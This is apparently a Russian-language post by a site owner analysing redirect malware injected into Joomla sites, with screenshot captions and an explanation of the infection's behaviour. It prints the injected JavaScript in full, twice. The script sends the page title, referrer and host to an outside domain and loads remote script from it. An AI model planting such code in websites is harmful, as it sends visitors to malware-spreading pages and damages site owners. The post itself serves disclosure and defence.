На одном web-сервере, на всех сайтах на Joomla одновременно появились вирусы с редиректом. Вирус имеет сложный алгоритм поведения. Он отправляет посетителей вашего сайта на говносайты, сайты с SMS вирусами и с другим вредоносным ПО.

Этот вирус не сразу обнаруживает владелец сайта так как вирус выполняет редирект только в том случае, если посетитель попал на сайт с поисковика или по рекламе и только если это новый посетитель. То есть, вирус перекрывает доступ к вашему сайту новым посетителям и сводит на нет все затраты на рекламу и всю работу по поисковой оптимизации сайта. Вирус причиняет владельцам коммерческих сайтов большой материальный ущерб.

Скриншоты демонстрируют работу этого вируса:

Сайты с вирусами

Сайт offroad-krkonose.cz, через который происходит редирект на инфицированные сайты, считается опасным.

Если проигнорировать предыдущее предупреждение или если предупреждение не появится, вы попадете на страницу распространяющую вирус.

Сайты с вирусами

 Переход на эту страницу произошел после того как я кликнул по ссылке на мой сайт в Яндексе.

Сайты с вирусами

Следующий код вируса был обнаружен на всех инфицированных сайтах:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://offroad-krkonose.cz/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Тот же вирус с разбиением на строки:

<script>
  var a='';
  setTimeout(10);
  var default_keyword = encodeURIComponent(document.title);
  var se_referrer = encodeURIComponent(document.referrer);
  var host = encodeURIComponent(window.location.host);
  var base = "http://offroad-krkonose.cz/js/jquery.min.php";
  var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
  var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
  if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '')
{document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');} </script>

Этот код работает следующим образом:

Если посетитель попал на ваш сайт по ссылке с другого сайта. document.referrer не пустое значение,

Если на вашем сайте заполнен title,

То, на вашу страницу будет загружен JavaScript код с сайта  offroad-krkonose.cz

И, скорее всего, произойдет редирект на сайт, распространяющий вирусы.

Или страница с вирусом будет сгенерирована.